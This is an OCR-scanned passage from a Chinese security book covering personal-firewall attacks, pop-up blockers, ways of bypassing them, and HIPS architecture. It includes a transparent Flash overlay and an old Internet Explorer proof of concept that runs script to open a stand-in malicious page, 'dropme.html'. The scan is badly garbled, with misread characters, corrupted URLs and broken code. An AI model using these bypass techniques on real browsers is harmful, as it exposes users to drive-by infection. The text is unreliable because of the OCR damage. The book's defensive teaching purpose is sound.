ICQ 响 应 ， 在 IlSs 产 品 的 协议 分 析 模 块 (PAM) 中 解析 并 且 在 内 存 中 运行 ， 这 里 它 可 以 简单 地 扫描 其 他 有 漏洞 的 主机 并 且 试图 从 
受 感染 的 主机 进行 传播 。 

结果 前面 已 经 提 到 ， 这 是 第 一 个 专门 针对 个 人 防火 墙 平台 的 蠕虫 ， 所 以 要 记 住 更 新 软件 产品 ， 并 且 定 时 检查 安全 型 供应 商 
的 网 站 ， 阅 读 关 于 针对 你 的 系统 的 未 被 察觉 的 任何 新 攻击 内 容 。 你 可 以 看 到 ， 一 旦 主机 被 恶意 软件 感染 ， 恶 意 软 件 能 够 操纵 任何 
运行 在 主机 上 的 应 用 程序 ， 包 括 个 人 防火 墙 。 恶 意 病 毒 能 够 修改 、 完 全 避 开 甚至 关闭 防火 墙 软件 。 

如 果 你 的 个 人 防火 墙 没有 正确 地 调整 ， 可 能 会 生成 太 多 的 警告 ， 使 你 缺乏 分 辨 真正 的 警告 和 假 阳 性 的 敏感 性 。 基 于 特征 码 的 
软件 防火 墙 对 于 特征 码 引 警 难 以 识别 的 变种 攻击 也 是 脆弱 的 。 最 终 ， 基 于 软件 的 个 人 防火 墙 可 能 遭 到 任何 基于 内 核 的 攻击 ， 以 
及 /或 有 意 无 意 地 注入 到 主机 上 运行 的 任何 应 用 程序 安全 缺陷 的 破坏 。 


ô 个 人 防火 墙 攻击 





许多 攻击 可 以 用 来 避 开 基于 软件 的 个 人 防火 墙 。 我 们 将 阐述 几 种 可 以 攻击 基于 Windows 的 防火 墙 的 方法 。 例 如 ， 遭 到 
Sasser 攻 击 的 LSAsS 漏 洞 是 利用 了 RPC DCOM 漏 洞 ， 这 个 漏洞 提供 了 主机 的 管理 访问 权 。 使 用 这 种 后 门 访问 ， 攻 击 者 可 以 修改 
或 者 禁用 软件 防火 墙 而 不 为 用 户 所 知 。 如 果 有 恶意 软件 可 以 以 管理 权限 运行 ， 则 不 必 避 开 基 于 软件 的 防火 墙 ， 因 为 攻击 者 可 以 简单 
地 在 防火 墙 规 则 上 打开 一 个 洞 ， 而 不 向 用 户 显 示 ， 这 是 由 于 这 些 操作 在 ring0 受 到 保护 。 你 可 以 
在 https:/Vtechnet.microsoft.com/en-usylibrary/securityms04-011.aspx 上 学 习 更 多 关于 LSASS 漏 洞 的 知识 。 


攻击 者 也 可 以 阻止 你 的 主机 访问 更 新 网 站 获取 操作 系统 补丁 、 防 病毒 特征 码 更 新 及 /或 你 的 个 人 防火 墙 应 用 程序 更 新 。 一 旦 
你 的 操作 系统 受到 感染 而 且 攻 击 者 得 到 管理 权限 ， 恶 意 软 件 就 可 以 使 用 任意 的 方法 来 危害 你 的 操作 系统 。 


一 
为 了 避 开 这 些 类 型 的 攻击 ， 尽 可 能 在 最 低 的 层次 ( 即 NDIS 层 ) 进行 过 滤 。 如 果 过 滤 在 较 高 的 层次 进行 ， 那 么 绕 开 基于 软件 
的 防火 墙 几乎 总 是 很 容易 。 没 有 人 说 NDIS 过 滤 是 完美 的 ， 但 是 它 的 许多 弱点 得 到 保护 ， 而 且 在 这 个 层次 里 ， 是 目前 监控 网 络 应 


用 程序 的 最 佳 方法 。 昌 然 NDIS 过 滤 仍 然 是 最 好 的 措施 ， 但 是 设计 和 维护 NDIS 使 其 进行 更 强 的 过 滤 也 更 加 困难 ， 因 为 使 用 较 高 的 
层次 过 滤 的 操作 稍 后 可 以 在 NDIS 层 中 进行 分 析 。 你 会 发 现在 NDIS 层 中 分 析 所 有 加 密 的 流量 或 者 应 用 程序 更 容易 ， 因 为 所 有 通信 
在 这 里 都 是 未 加 密 的 。 你 还 可 以 实现 一 些 攻击 方法 ， 以 替换 、 更 新 以 及 /或 表现 的 像 NDIS 驱 动 程序 一 样 ， 这 将 突出 你 在 主机 上 监 
控 事 件 的 能 力 。 保 护 这 些 关 键 应 用 的 最 重要 方面 是 监控 驱动 程序 本 身 ， 确 保 它 们 不 受 纂 改 。 你 还 可 以 监控 API 调 用 ， 提 供 更 多 的 
保护 层次 。 


8.2 ”弹出 窗口 拦截 程序 


这 类 主机 保护 方法 由 Opera 浏 览 器 在 21 世 纪 初 引入 。 到 2004 年 ， 几 乎 所 有 Web 浏 览 器 都 包含 了 某 种 水 平 的 弹出 式 广 告 拦 
截 ， 以 增加 最 终 用 户 在 互联 网 上 冲浪 时 的 安全 。 现 在 ， 广 告 拦截 是 大 部 分 流行 浏览 器 的 功能 之 一 ， 在 第 三 方 应 用 中 也 可 以 找到 ， 
或 者 作为 扩展 /浏览 器 工具 。 大 部 分 此 类 应 用 都 是 免费 的 ， 但 是 与 所 有 免费 提供 的 功能 一 样 ， 熟 悉 这 些 工具 的 使 用 条 款 是 很 重要 
的 ， 因 为 最 终 没有 真正 免费 的 东西 。 


在 第 2 章 中 我 们 介绍 过 ， 有 恶意 软 件 采用 弹出 广告 作为 诱骗 用 户 以 各 种 方式 单 击 窗口 的 一 种 方法 。 有 时 候 甚 至 单 击 右 上 角 
AY "X" (XA) 框 都 会 启动 恶意 代码 的 执行 ， 这 些 代码 之 后 就 在 主机 上 运行 。 开 始 ， 弹 出 式 窗口 是 一 种 吸引 用 户 注意 力 的 直接 
广告 方法 。 但 是 ， 随 着 时 间 的 推移 ， 地 下 组 织 发 现 可 以 使 用 这 些 弹 出 式 窗口 作为 绕 开 浏览 器 安全 并 且 直 接 在 不 为 用 户 所 知 的 情况 
下 进行 感染 的 方法 。 今 天 ， 几 乎 所 有 免费 的 色情 、 种 子 和 文件 共享 网 站 都 在 其 图 像 、 音 频 和 视频 文件 中 直接 或 者 间接 地 庶 入 恶意 
内 容 。 最 活跃 且 最 具 毁 痰 性 的 弹出 式 窗 口 是 带 有 活动 内 容 的 、 基 于 Flash 的 弹出 式 窗 口 ， 活 动 内 容 的 执行 除了 简单 的 “鼠标 悬 
停 ” 之 外 ， 不 需要 用 户 进行 任何 其 他 操作 。 


另 一 种 出 现 多 年 的 弹出 式 窗口 类 型 是 ， 要 求 用 户 安装 第 三 方 插件 以 便 查 看 某 些 网 页 上 的 活动 内 容 的 “远程 安装 ”窗口 。 没 有 
意识 到 这 类 威胁 的 用 户 将 安装 这 个 插件 ， 而 不 知道 它 包含 了 执行 后 门下 载 程序 或 者 第 一 阶段 木马 下 载 的 嵌入 代码 ， 然 后 这 些 代码 
将 在 主机 上 运行 并 从 用 户 不 知道 的 网 站 上 下 载 更 多 的 恶意 内 容 。 各 种 浏览 器 都 尝试 阻止 这 类 静默 安装 ， 方 法 是 要 求 用 户 在 单 击 链 
接 绕 过 弹出 窗口 过 滤器 时 按 下 Ctrl 键 。 


在 本 节 中 ,我们 将 介绍 一 些 当 今 占 统治 地 位 的 Web 浏 览 器 ， 以 便 更 好 地 理解 它们 保护 你 的 主机 免 遭 恶意 软件 感染 的 能 力 。 
在 “弹出 式 窗口 拦截 程序 攻击 ”小 节 中 ， 我 们 将 帮助 你 更 好 地 理解 为 什么 大 部 分 弹出 式 窗口 拦截 程序 不 能 让 你 感觉 温暖 和 安心 。 


8.2.1 Chrome 


Chrome 与 Google 公 司 搜索 引擎 的 联系 使 其 成 为 目前 为 止 最 强大 的 浏览 器 之 一 ， 具 有 丰富 的 特性 ， 可 以 使 用 你 的 GooGle 账 
户 人 存储、 索引 、 搜 索 和 共享 信息 。 尽 管 Chrome 与 搜索 引 警 巨人 连接 ， 但 和 其 他 浏览 器 一 样 容 易 受 到 漏洞 和 攻击 的 影响 。 与 
Safari 类 似 ，Chrome 也 在 2008 年 遭受 了 地 毯 式 丢 炸 攻击 。Chrome 和 其 他 浏览 器 的 显著 不 同 是 它 具 有 一 个 弹出 式 窗口 隐藏 模 
块 ， 而 不 是 阻止 弹出 式 窗口 执行 。 这 个 模块 不 禁用 弹出 式 窗口 ， 而 是 允许 弹出 式 窗口 在 一 个 受 保护 的 空间 里 打开 ， 这 样 互联 网 广 
告 仍然 产生 收入 并 且 为 有 偿 服 务 打开 了 一 扇 窗户 。 这 种 设计 的 另 一 个 好 处 是 不 会 影响 Google 公 司 的 AdWords 客 户 ， 因 为 
Google 公 司 不 销售 弹出 式 广 告 。 


下 面 是 其 他 拦截 弹出 式 广告 的 浏览 器 列表 : 
- Avant Browser (http://www.avantbrowser.com/) 
- Enigma Browser (http://enigma-browser.software.informer.com/3.8/) 
- 基于 Gecko 的 浏览 器 : 
- e-Capsule Private Browser (http://e-capsule.net/e/pb/) 
- Epiphany (https: //launchpad.net/ubuntu/+source/epiphany-browser) 
- K-Meleon (http://kmeleonbrowser.org/ ) 


- SeaMonkey (http://www.seamonkey-project.org/) 


* Konqueror (https://konqueror.org/ ) 

- Maxthon (http://www.maxthon.com/) 

- OmniWeb Chttps://www.omnigroup.com/more ) 

- Slim Browser (http://www.slimbrowser.net/en/) 
下 面 的 附加 程序 也 能 拦截 弹出 式 广告 : 

- Adblock 

- Adblock plus 

- Adblock Pro 

- Alexa Toolbar 

- Bayden Systems 

- NoScript (开源 ，GPL) 

. Privoxy 

- Proxomitron 

- Super Ad Blocker 

- Speereo Flash Killer (免费 软件 ) 


- Yahoo! Toolbar 


8.2.2 Firefox 


Mozilla 的 Firefox 是 当今 男 一 个 广泛 使 用 的 重要 浏览 器 。Firefox 弹 出 式 窗口 拦截 的 优势 在 于 多 种 保护 级 别 ， 人 允许 用 户 完全 定 
义 弹 出 式 窗 口 的 使 用 级 别 ， 甚 至 在 默认 的 配置 中 ， 它 不 需要 用 户 进行 任何 启用 或 者 允许 特定 弹出 式 窗 口 的 操作 就 能 阻止 所 有 弹出 
式 窗 口 。 它 提供 的 保护 将 每 种 弹出 式 窗口 分 为 警告 、 通 知 用 户 和 要 求 用 户 采 取 措 施 。 尽 管 Firefox 在 阻止 弹出 式 窗口 上 做 得 很 
好 ， 但 是 仍然 有 和 其 他 互联 网 浏览 器 类 似 的 弱点 。 尽 管 Firefox 阻 止 大 部 分 弹出 式 窗 口 ， 但 是 一 些 网 站 能 够 执行 远程 弹出 式 代 


码 。 我 们 来 谈 谈 一 些 这 类 代码 .…… 


所 有 远程 网 站 被 阻止 访问 file: // 命 名 空间 ， 这 禁止 了 本 地 文件 访问 ( 读 或 者 写 ) 。 但 是 当 用 户 决 定 允 许 一 个 被 拦截 的 弹出 
式 窗口 时 ， 将 会 绕 过 常规 的 URL 权 限 。 发 生 这 种 情况 时 ， 攻 击 者 能 够 欺骗 浏览 器 检查 本 地 文件 系统 上 一 个 预定 义 的 路 径 中 保存 的 
HTML 文 件 ， 实 际 上 读 取 了 用 户 曾 经 访问 过 的 所 有 网 站 的 所 有 文件 。 这 个 文件 之 后 可 以 在 远程 服务 器 重 现 ， 为 攻击 者 提供 关于 用 
户 曾 经 访问 的 网 站 以 及 访问 频率 的 信息 。 这 一 过 程 使 攻击 者 能 更 好 地 了 解 你 所 去 过 的 网 站 以 及 访问 的 频率 ， 他 可 以 在 其 他 时 候 再 
次 直接 地 针对 你 。 


但 是 ， 在 定期 更 新 的 情况 下 ，Firefox 能 够 拦截 几乎 所 有 已 知 的 弹出 式 技术 。 已 经 证 明 ，Firefox 拦 截 附加 对 话 框 的 能 力 对 浏 
览 器 锁定 程序 受害 者 很 有 价值 。 浏 览 器 锁定 程序 及 其 防护 措施 的 更 多 信息 可 参见 https://blogs.rsa.com/more-than-meets- 


the-eye/ 和 https://blogs.rsa.com、more-than-meets-the-eye-part-2-solving-the-browser-lock-ransom-page/。 


8.2.3 Microsoft Edge 


Microsoft Edge 是 Internet Explorer 的 改进 或 者 发 展 版 本 ， 承 诺 更 好 的 稳定 性 、 性 能 、 易 用 性 和 安全 性 。 随 着 Edge 在 
Windows10 中 推出 ， 浏 览 体验 也 变 得 更 加 流畅 。 


Microsoft 声 称 ， 它 将 更 好 地 防御 恶意 网 站 ， 提 供 许多 安全 扩展 ， 以 及 应 用 程序 沙 箱 ， 以 抵御 未 知 的 浏览 器 威胁 。 由 于 这 个 
浏览 器 还 相当 新 ， 我 们 无 法 对 其 做 出 评估 。 


8.2.4 Safari 


Safari 由 苹果 公司 开发 ， 是 Mac OS 中 的 自 带 浏 览 器 。Safari 在 2007 年 1 月 的 Mac OS X 操 作 系 统 上 发 行 了 beta 版 本 ， 现 在 已 
经 成 为 过 去 这 10 年 Mac OS 的 事实 标准 。Safari 的 弹出 式 窗口 拦截 程序 是 另 一 个 具有 有 趣 功 能 的 合法 浏览 器 工具 ， 提 供 了 一 个 简 
易 的 选项 Command-K 来 开关 弹出 式 窗 口 拦截 程序 。 你 还 可 以 单 击 Safari 菜 单 选择 拦截 弹出 式 窗口 。 与 其 他 程序 类 似 ，Safari 的 
拦截 程序 可 以 拦截 几乎 所 有 弹出 广告 ,包括 最 被 滥用 的 Flash 弹 出 窗口 。 关 于 Safari 浏 览 器 的 缺陷 经 常 公布 并 且 往 往 很 快 地 修 
补 。 整 体 上 ，Ssafari 浏 览 器 相对 其 他 一 些 主流 浏览 器 来 说 是 稳定 的 、 经 过 测试 的 并 且 快 速 修补 的 。Safari 也 提供 丰富 的 扩展 ， 可 
以 从 https://safari-extensions.apple.com 安 装 。 


8.2.5 一 般 的 弹出 式 窗 口 拦截 程序 代码 实例 


有 很 多 构建 或 者 绕 过 弹出 式 窗口 拦截 程序 的 方法 。 这 里 的 例子 只 是 阐述 任何 人 都 能 够 使 用 相似 的 方法 很 容易 地 建立 自己 的 弹 
出 式 窗口 拦截 程序 : 


// 
// IOleObjectWithSite Methods 
// 
STDMETHODIMP CPub::SetSite(IUnknown *BUnkSite) 
{ 
if (!pUnkSite) 
{ 
ATLTRACE ( T ("SetSite(): BUnkSite is NULL\n") ); 
} 
else 


{ 


// Query pUnkSite for the IWebBrowser2 interface. 
m_spWebBrowser2 = BUnkSite; 
if (m_spWebBrowser2) 


{ 
// Connect to the browser in order to handle events. 
HRESULT hr = ManageBrowserConnection(ConnType Advise) ; 
if (FAILED (hr) ) 
ATLTRACE(_T("Failure sinking events from IWebBrowser2\n") ) ; 
} 


else 


ATLTRACE( T("QI for IWebBrowser2 failed\n") ) ; 


return S_OK; 


@ 弹出 式 窗 口 拦截 程序 攻击 





尽管 弹出 式 窗 口 拦截 程序 有 许多 好 处 ， 但 是 它们 也 能 够 被 避 开 。 广 告 商 不 断 支持 绕 开 弹 出 式 窗 口 拦截 程序 的 方法 ， 以 得 到 他 
们 的 按 单 击 付费 和 直接 广告 市 场 。 大 体 上 ， 绕 过 弹出 式 窗 口 拦截 程序 随 着 时 间 推 移 越 来 越 难 ; 然而 ， 攻 击 者 依然 能 够 避 开 弹出 式 
窗口 拦截 程序 。 是 什么 使 得 一 个 系统 容易 受到 弹出 式 .窗口 的 攻击 ? 这 个 问题 提 得 好 ! 


为 了 提高 攻击 效率 ， 攻 击 者 必须 植 入 能 够 很 容易 地 预测 和 执行 的 文件 ， 以 便利 用 目标 系统 。 所 有 主流 浏览 器 有 时 都 会 在 临时 
目录 中 创建 完全 确定 性 的 文件 名 ， 这 些 I 临 时 目录 在 打开 频繁 访问 外 部 应 用 程序 的 文件 时 可 用 。 大 部 分 临时 文件 使 用 有 缺陷 的 算法 
如 nsExternal AppHandler: : SetUpTempFile 等 创建 。 问 题 是 stdlib 线 性 同 余 伪 随机 数 生成 器 (srandy/rand， 即 srand 和 rand 
支持 随机 数 生成 ) 在 文件 创建 之 前 用 以 秒 计算 的 当前 时 间作 为 种 子 。 接 下 来 ，rand () 可 以 用 于 直接 生成 一 个 “不 可 预测 ”的 
文件 名 。 一 般 ， 如 果 PRNG 只 在 程序 启动 时 选择 一 次 种 子 ， 在 后 续 的 调用 中 结果 将 是 确定 性 的 ， 但 是 在 实际 中 难以 盲目 预测 。 这 
项 任务 现在 变 得 简单 得 多 了 : 我 们 知道 何 时 开始 下 载 ; 种 子 是 什么 ;并且 知 道 后 续 有 多 少 个 调用 一 一 于 是 我 们 知道 了 结果 。 


尽管 软件 制造 商 在 处 理 弹 出 窗口 方面 已 经 取得 进展 ， 但 回 过 头 去 了 解 各 种 用 于 避 开 弹出 窗口 拦截 程序 的 方法 仍然 很 重要 。 


弹出 式 窗口 覆盖 


前 面 提 到 的 一 些 最 现代 的 躲避 弹出 式 窗口 拦 截 程序 的 方法 ， 包 含 基于 Adobe Flash 的 攻击 。 这 种 方法 很 简单 ， 因 为 它 人 允许 一 
个 谋 入 式 Flash 动 画 片段 执行 。 用 户 一 般 将 他 的 鼠标 移 到 小 的 关闭 框 上 ， 而 完全 透明 的 Flash 广 告 被 直接 投影 在 浏览 器 的 网 页 之 
上 ， 没 有 任何 关闭 窗口 的 选项 。 这 种 方法 被 称 为 弹出 式 窗口 覆盖 (pop-up overlay) 。 看 看 后 面 的 例子 ， 不 需要 任何 弹出 式 窗 
口 就 能 运行 。 这 种 覆盖 也 可 以 在 鼠标 放置 在 动画 之 上 或 者 在 动画 中 设置 时 间 表 期 间 运 行 可 执行 代码 。 


<object 

classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 

codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab 

#version=5,0,0,0" 

width="32" height="32"> 

<param name=movie value="http://www.suspectURL. com/animation.swf"> 

<param name=quality value=high> 

<embed src="http://www.allsyntax.com/movie.swf" quality=high 

pluginspage="http://www.macromedia.com/shockwave/download/index.cgi 
?Pl1 Prod_Version=ShockwaveFlash" 

type="application/x-shockwave-flash" width="32" height="32"> 

</embed> 

</object 

<param name="wmode" value="transparent"> 


这 种 攻击 组 合 了 一 个 横幅 广告 和 一 个 弹出 式 窗口 ， 使 用 DHTML 以 出 现在 浏览 器 屏幕 的 前 面 。 当 与 JavaScript 一 起 使 用 时 ， 
这 种 方法 也 可 以 像 一 个 透明 的 弹出 式 窗口 一 样 工 作 ， 和 Flash 覆 盖 类 似 。 用 这 种 方法 较 容 易 感 染 用户 的 工作 站 ， 所 以 最 安全 的 方 
法 就 是 在 浏览 网 站 时 禁用 JavaScript。 下 面 这 个 例子 很 普通 ， 但 是 说 明了 创建 这 种 广告 有 多 容易 : 


<script type="text/javascript" src="adv.js"></script> 
<link rel="stylesheet" href="adv.css" type="text/css" /> 


<div id="al" class="adv"><table border="0" width="100%"> 

<tr><td align="center"><a href="http://www.victim.com/"><img src="hoopla.gif" 

width="65" height="55" border="0" alt="victim Pty Ltd" /></a> 

</td></tr></table> 

<p align="center">Would you like to be infected?</p><p align="center"> 
<cTypeface:Bold>We can help. </b></p><p align="center"><a href="http://www.victim.com/"> 
Ask Ownage</a><br />With something really nasty?</p><hr /><p align="center"> 

<a href="#" onclick="showAd('al',0,0) ">Close</a></p> </div> 


下 面 是 另 一 个 对 Microsoft Windows Service Pack2 的 Internet Explorer 执 行 恶意 代码 的 例子 。 这 段 代 码 允 许 攻 击 者 执行 
JavaScript 代 码 ， 将 虚假 的 允许 网 站 加 入 弹出 式 窗 口 拦截 程序 的 信任 列表 。 这 个 例子 有 点 老 旧 ， 但 是 具有 概念 验证 性 ， 能 够 说 明 
这 种 方法 。 


< body onload="setTimeout(' main() ',1000)"> 

< object 

idar" 

classid="clsid: 2D360201-FFF5-11d1-8D03-00A0C959BCOA" 
width="1" 

height="1" 

align="middle" 

> 

< PARAM NAME="ActivateApplets" VALUE="1"> 

< PARAM NAME="ActivateActivexXControls" VALUE="1"> 
</object> 


< SCRIPT> 


// http://www.example.com 


function shellscript () 


{ 


open("http://www.malicious.net/dropme.html"," blank", "scrollbar=no") ; 
showModalDialog("http://www.malicious.net/dropme.htm1") ; 


} 


function main() 


{ 


x.DOM.Script.execScript (shellscript.toString()); 
x.DOM.Script.setTimeout ("Sshellscript()") ; 


} 


</SCRIPT> 
<br><br><br><br><br><br><center><img src=woot.gif><br><br><FONT FACE=ARIAL SIZE 
12PT>WOOT</FONT></center> 


= 弹出 式 窗口 拦截 程序 对 策 


现在 ， 弹 出 式 窗 口 拦截 程序 的 最 佳 对 策 是 保护 你 的 主机 并 且 正 确 地 为 你 的 弹出 式 窗口 拦截 软件 配置 策略 和 安全 级 别 。 底 线 是 
确保 你 安装 了 所 有 最 新 的 浏览 器 补丁 ， 因 为 浏览 器 是 主要 的 注入 方向 。 除 了 这 些 简单 的 方法 和 注意 事项 ， 作 为 用 户 ， 你 没有 太 多 
可 做 的 。 


8.3 小 结 


你 的 主机 是 当今 威胁 局 面 下 的 第 一 个 和 最 后 一 个 堡 鑫 ， 嵌 入 到 防 学 攻击 者 及 其 工具 的 前 线 。 过 去 的 几 年 除了 蠕虫 或 者 bot， 
没有 看 到 太 多 从 主机 到 主机 的 直接 网 络 攻击 。 然 而 ， 作 为 一 个 管理 员 ， 你 将 看 到 越 来 越 多 直接 的 方法 ， 包 括 鱼 叉 仿冒 、 客 户 端 利 
用 以 及 文档 中 的 嵌入 代码 。 所 有 这 些 方法 都 指向 最 终 用 户 及 其 容易 上 当 的 特性 ， 他 们 会 打开 、 执 行 以 及 /或 浏览 不 安全 的 网 站 ， 
或 者 登录 并 且 单 击 按钮 。 


最 后 ， 你 确实 需要 维护 尽 可 能 多 的 保护 措施 ， 以 确保 主机 远离 攻击 者 ， 以 及 那些 好 奇 并 且 有 时 候 只 为 了 看 看 发 生 的 情况 而 弄 
乱 设置 的 用 户 。 本 章 包含 了 许多 可 供 挖掘 的 信息 ， 但 是 作为 管理 员 ， 必 须 了 解 什么 工具 能 够 保护 你 的 最 终 用 户 和 企业 资产 。 对 于 
保护 企业 主机 ， 没 有 什么 是 比 确保 你 更 新 到 最 新 的 安全 解决 方案 更 重要 的 。 你 的 企业 主机 处 于 前 线 ， 攻 击 者 只 需要 访问 到 一 个 系 


统 ， 一 切 就 都 大 晚 了 。 


第 9 章 ”基于 主机 的 入 侵 预 防 


简单 地 说 ， 基 于 主机 的 入 侵 预 防 系统 (HIPS) 是 监控 本 地 操作 系统 和 安装 的 应 用 程序 ， 以 便 防范 未 授权 的 执行 以 及 在 本 地 
主机 上 恶意 进程 的 启动 的 一 种 基于 主机 的 应 用 程序 ， 而 网 络 入 侵 预 防 系统 (NIPS) ， 尽 管 表 现 相似 ， 但 设计 的 目的 是 保护 网 络 
而 不 是 单个 主机 。 入 侵 预防 系统 实时 监控 系统 活动 以 寻找 特定 的 恶意 行为 ， 然 后 试图 阻止 及 /或 避免 这 些 进 程 执行 。HIPs 系 统一 
般 用 于 保护 关键 的 企业 服务 器 和 用 户 工 作 站 免 遭 实时 的 可 移动 代码 爆发 ， 这 些 代码 一 般 利用 在 企业 中 运行 时 产生 的 信任 。 


9.1 ” HIPS 体系 结构 
HIPS 一 般 是 企业 中 提供 入 侵 检测 和 入 侵 了 预防 的 许多 组 件 之 一 。 许 多 供应 商 提 供 插入 企业 网 络 的 “全 寿命 ”或 者 “包围 
式 ” 的 IDS/IPS 解 决 方案 。 下 面 是 一 些 你 在 基于 主机 的 入 侵 预 防 系 统 中 通常 会 找到 的 组 件 : 


. 安全 信息 和 事件 管理 服务 器 (SIEM) ”这 是 安全 系统 基础 结构 管理 服务 器 的 常用 名 称 。SIEM 一 般 利 用 其 他 企业 安全 设备 
而 不 只 是 IDS/IPS 系 统 的 信息 。SIEM 使 你 能 从 防火 墙 、 服 务 器 、 防 病毒 产品 以 及 许多 其 他 日 志 中 接受 安全 信息 ， 给 你 一 个 清晰 的 


网 络 分 析 视 图 。 


. 基于 主机 的 入 侵 防 御 系 统 (HIDS) 这 是 一 个 监控 计算 机 入 站 和 出 站 通信 以 及 应 用 程序 的 被 动 式 IDS。 这 类 IDS 只 发 出 警 
告 而 不 试图 拒绝 或 者 阻止 可 疑 的 操作 ， 而 HIPS 试 图 拒绝 或 者 阻止 入 侵 。 


- 网 络 入 侵 检 测 系 统 (NIDS) ”这 种 被 动 式 的 IDS 可 监控 网 络 并 且 对 可 疑 活 动 提出 警告 。 这 种 报警 机 制 或 者 方法 仅仅 根据 
你 所 拥有 的 入 侵 检 测 系 统 的 类 型 或 者 家 族 (行为 或 者 特征 码 ) 而 定 。 


. 网 络 入 侵 预 防 系统 (NIPS) 这 种 主动 式 的 入 侵 检测 能 识别 可 疑 活动 并 且 拒 绝 网 络 访问 ， 从 而 阻止 恶意 软件 攻击 和 传 


下 面 是 一 些 简 单 的 说 明 HIPS 常 见 体系 结构 的 图 解 ， 解 释 了 HIPS 如 何 补 充 其 余 的 入 侵 监 测 网 络 ， 达 到 预防 恶意 软件 爆发 的 最 
佳 效果 。 


工作 站 视图 ”图 9-1 显 示 了 HIPS 在 所 有 工作 站 上 的 放置 ， 提 供 工作 站 的 预防 性 保护 。 


网 络 视图 ”在 网 络 中 使 用 入 侵 预 防 系 统 时 ， 你 一 般 应 该 将 用 户 和 服务 器 分 割 为 不 同 的 段 ， 以 便 快 速 地 识别 网 络 的 哪 一 端 遭 受 
最 新 的 恶意 软件 感染 。 你 可 以 在 任何 两 段 之 间 再 分 段 。 这 种 方法 在 阻止 恶意 病毒 传播 时 很 有 用 。 
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打印 服务 器 


图 9-1 服务 器 IDS、 网 络 IPS 以 及 基于 工作 站 的 IPS 体 系 结 构 


服务 器 视图 在 图 9-1 中 的 服务 器 段 ， 你 看 到 混合 、 各 自分 离 的 HHDS 和 HIPS。 有 些 经 营 者 希望 在 关键 系统 上 使 用 被 动 式 入 
侵 检测 ， 这 样 日 常 业务 运作 不 会 受到 影响 。 这 是 谨慎 的 业务 方法 ， 因 为 应 用 程序 有 时 候 会 有 预期 之 外 的 表现 并 且 偶 尔 会 拒绝 对 关 
键 应 用 程序 的 访问 。 


工作 站 视图 图 9-2 也 显示 了 HIPS 在 所 有 工作 站 上 的 放置 ， 这 提供 了 工作 站 的 预防 性 保护 。 在 图 9-1 中 可 以 看 到 ， 这 种 方法 
在 与 恶意 软件 战斗 时 是 非常 稳定 的 纵深 防御 。 


网 络 视图 在 图 9-2 中 你 可 以 看 到 ， 在 两 个 网 端 上 都 实施 了 被 动 式 的 入 侵 检测 。 这 种 配置 能 够 发 现 恶意 软件 ， 但 是 在 拒绝 恶 
意 软件 网 上 运行 方面 不 进行 任何 操作 。 


服务 器 视图 在 图 9-2 的 整个 服务 器 段 中 ， 你 再 次 看 到 混合 的 各 自分 离 的 HIDS 和 HIPS。 我 们 曾经 见 过 的 几乎 所 有 网 络 都 有 
某 种 水 平 的 混合 HIDS 和 HIPS 服 务 器 场 ， 这 是 因为 业界 关于 主要 网 段 之 间 的 入 侵 预 防 系统 的 迷信 ， 以 及 在 访问 所 提供 的 信息 时 ， 
由 于 IPS 关 闭 一 个 连接 而 造成 的 可 疑 操作 。 因 为 这 种 迷信 有 时 候 会 成 为 事实 ， 管 理 者 在 提 到 关键 系统 上 的 HIPS 时 有 理由 感到 紧 
张 。 


在 防御 已 知 和 零 日 攻击 时 ， 结 合 HIDS 和 HIPS 也 是 一 种 好 的 做 法 。 


工作 站 视图 ”在 图 9-3 中 ，HIPS 也 放置 在 所 有 工作 站 上 ， 提 供 预 防 性 保护 。 整 体 上 ， 这 是 在 网 络 上 实施 HIPS 的 建议 配置 。 
工作 站 是 最 有 可 能 被 感染 的 网 络 组 件 。 


网 络 视图 ”你 只 能 将 具有 可 用 于 每 个 网 段 之 间 的 超过 一 个 LAN 接 口 的 高 端 NIPS 用 在 这 种 方法 中 。 使 用 这 种 方法 ， 可 在 一 个 
设备 掌握 网 络 持续 性 的 命运 时 为 这 些 配置 建立 见 余 ， 这 是 个 好 主意 。 
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打印 服务 器 


图 9-2 ”基于 网 络 和 基于 主机 混合 的 IPS 和 IDS 体 系 结 构 


服务 器 视图 ”图 9-3 中 显示 的 配置 在 你 不 能 做 任何 冒险 且 安 全 远 比 操作 重要 时 有 用 。 在 你 希望 尽 可 能 快 地 阻止 恶意 软件 在 服 
务 器 上 传播 时 ， 部 署 这 种 服务 器 保护 。 
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图 9-3 ”基于 网 络 和 主机 的 IPS 体 系 结构 


9.2 ”超过 入 侵 检测 的 增长 


入 侵 预 防 技术 的 先驱 是 入 侵 检测 ， 在 这 种 技术 中 ， 采 用 静态 的 特征 码 集 以 便 识别 网 络 或 者 主机 上 不 需要 的 以 及 /或 恶意 的 流 
量 。1IPs 比 IDS 有 多 种 优势 ， 具 体 地 说 ，1PSs 设 计 为 伐 入 到 通信 流 中 预防 攻击 ， 而 不 是 在 线路 上 空转 ， 只 在 发 生 了 安全 人 员 可 能 
意 或 者 不 注意 的 事件 时 发 出 一 个 警告 。 大 部 分 |Ps 还 能 够 检查 和 解码 网 络 封包 到 第 7 层 (应 用 层 ) ， 提 供 对 穿越 网 络 的 实际 数据 
内 容 更 深入 的 观察 ， 这 是 当今 的 攻击 所 隐藏 的 地 方 。 封 包 解码 (parket decoding) 是 取得 二 进 制 数 据 并 且 将 其 传递 给 一 个 引 
擎 ， 再 由 该 引擎 解码 为 人 类 可 读 的 形式 的 一 个 过 程 。 在 封包 检查 的 分 析 阶 段 ， 分 析 人 员 将 审核 解码 后 的 封包 内 的 信息 ， 试 图 验证 
检测 到 并 且 可 见 的 网 络 活动 。 


加 密 的 网 络 流量 无 法 分 析 一 一 这 是 隐蔽 信道 的 另 一 个 实例 。 用 于 保证 通信 安全 的 加 密 过 程 在 两 个 主机 和 传统 ID 之 间 处 理 ， 
但 是 这 个 过 程 无 法 拦截 解密 数据 流 所 必需 的 会 话 密 铀 。 然 而 ， 如 果 在 加 密 流 通过 时 配置 了 庶 入 式 IPS，1PS 能 够 处 理 每 个 封包 ， 看 
到 数据 流 的 内 容 ， 并 且 将 解码 后 的 流传 递 给 漏洞 和 攻击 分 析 模 块 以 进行 更 深入 的 封包 检查 。 


HIPSs 在 许多 方面 都 更 强大 ， 因 为 它 不 需要 大 部 分 基于 特征 码 的 产品 所 需要 的 常规 更 新 机 制 ， 它 的 目标 是 识别 恶意 软件 执行 
